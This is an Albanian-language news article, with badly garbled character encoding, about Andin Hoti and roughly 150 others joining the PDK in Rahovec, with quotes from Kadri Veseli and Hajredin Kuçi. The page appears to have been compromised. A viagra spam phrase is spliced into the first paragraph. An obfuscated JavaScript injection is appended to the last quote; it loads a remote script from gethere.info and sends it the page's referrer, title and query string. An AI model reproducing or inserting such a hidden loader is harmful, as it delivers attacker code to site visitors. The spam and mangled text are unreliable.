andin_hoti

Djali i Ukshin Hotit i bashkohet PDK-sA�

Rreth 150 anA�tarA� tA� rinj i janA� bashkuar tA� dielA�n PartisA� Demokratike tA� KosovA�s, dega nA� Rahovec, nA� mesin e tA� cilA�ve edhe Andin Hoti, djali i veprimtarit tA� shquar Ukshin Hoti. TA� gjitha kA�to aderime, po bA�hen nA� kohA�n e fushatA�s zgjedhore tA� PDK-sA� nA� degA�n e Rahovecit. best viagra online viagra.

Kadri Veseli, i cili pA�r herA� tA� parA� foli si anA�tar i PDK-sA�, tha se po sheh njA� karvan tA� gjatA� tA� njerA�zve tA� cilA�t kanA� vendosur ta��i bashkA�ngjiten kA�saj partie, duke pohuar se A�shtA� nder tA� jesh pjesA� e saj. Duke folur pA�r konceptin e partisA� tA� cilA�s i takon,ai tha se PDK A�shtA� forca lA�vizA�se nA� zhvillimin e shtetA�sisA� sonA�, duke e quajtur si njA� akt tA� veA�antA� gatishmA�rinA� e anA�tarA�ve tA� rinj qA� ta��i bashkA�ngjiten kA�saj partie, duke pranuar pA�rgjegjA�si pA�r jetA�n dhe familjet e tyre, pA�rmes vizionit tA� PDK-sA�.

NdA�rsa, Hajredin KuA�i, nA�nkryetar i PDK-sA�, njA�herit dhe zA�vendA�skryeministA�r i KosovA�s tha se qA� 13 vite tA� punA�s, PDK ka pasur mbA�shtetjen e plotA� tA� qytetarA�ve tA� Rahovecit. Ai tha se aderimi i 150 anA�tarA�ve tA� rinj, tregon se PDK ka qenA� nA� rrugA� tA� mbarA�. AnA�tarA�ve tA� rinj, KuA�i iu tha se kanA� bA�rA� zgjedhjen e duhur, duke pohuar se Kadri Veseli ka pasur kA�mbA�n e mbarA�.

a�?Sot u pA�rmenden shumA� figura dhe sot unA� do ta��i veA�oj dy, Kadri Veselin dhe Andin Ukshin Hotin. Dua ta��i veA�oj tA� dytA� dhe ta��ju them kA�shtu, se A�ndrrat tuaja nuk mund ta��i realizoni vetA�m nA� PDK. A�ndrrat tuaja janA� pA�r tA�rA� shtetin e KosovA�s, pA�r tA�rA� kombin shqiptar. Filozofia e Ukshin Hotit, A�shtA� filozofi kombA�tare me ndikim nA� politikA�n ndA�rkombA�tare. Por nA�se ne arrijmA� qA� tA� jemi krah i asaj filozofie, unA� mendoj se Andini do ta ndien vetA�n mirA�. Ukshin Hoti nuk A�shtA� vetA�m i juaji. A�shtA� i tA�rA� kombit shqiptar. A�shtA� i tA�rA� atyre qA� kanA� filozofi politike. Kadri Veseli me punA�n dhe angazhimin e tij ka punuar pA�r lirinA� dhe pavarA�sinA� e KosovA�s dhe sot po bA�n mirA� qA� po punon nA� PDK, pA�r ta forcuar shtetin e KosovA�sa�?, ka deklaruar KuA�i, ndA�rsa citon Kosovapress.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}